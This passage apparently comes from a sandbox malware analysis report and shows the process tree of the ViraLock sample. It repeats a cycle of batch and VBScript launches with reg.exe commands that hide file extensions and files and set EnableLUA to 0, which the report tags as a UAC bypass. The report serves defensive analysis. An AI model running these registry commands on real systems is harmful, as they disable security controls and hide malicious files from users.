        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MqMAwAAg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        120⤵
        System Location Discovery: System Language Discovery
        
        PID:5436
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MysEQEkY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        118⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        
        PID:5788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        117⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UagwwsQc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        116⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        Modifies registry key
        
        PID:1972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        UAC bypass
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rCwEwIsE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        114⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:6100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HUYsoswk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        112⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        
        PID:5988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        111⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hkgQUQUM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        110⤵
        
        PID:5428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yyskkwoc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        108⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gqIMcEoI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        106⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SyokgIEw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        104⤵
        
        PID:3132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5416
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ykcEsUAI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        102⤵
        
        PID:5656
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        System Location Discovery: System Language Discovery
        
        PID:5972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        101⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dSQYIYAw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        100⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        UAC bypass
        
        PID:5452
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOEwEAQs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        98⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        Modifies registry key
        
        PID:3448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RYIAcAsg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        96⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        Modifies registry key
        
        PID:1188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lmEkEUEk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        94⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        UAC bypass
        
        PID:5420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uwwUEkMQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        92⤵
        
        PID:1972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        93⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        System Location Discovery: System Language Discovery
        
        PID:5288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        UAC bypass
        
        PID:5332
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QuUsgYQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        90⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        
        PID:5256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        89⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EysQIYAY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        88⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UGAMkUYU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        86⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BaUYgAkY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        84⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        UAC bypass
        
        PID:5476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWoMIUoQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        82⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:5824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UEQMUgMA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        80⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wAcoIwAA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        78⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        UAC bypass
        
        PID:5636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQEcwkko.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        76⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        UAC bypass
        
        PID:5312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DqUMMUkE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        74⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        UAC bypass
        Modifies registry key
        
        PID:5976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZCwUcAYs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        72⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        UAC bypass
        
        PID:5540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XMsckYsQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        70⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        UAC bypass
        
        PID:3532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOgswsYA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        68⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        System Location Discovery: System Language Discovery
        
        PID:1924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        UAC bypass
        
        PID:4648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QksUMAUU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        66⤵
        
        PID:404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        UAC bypass
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
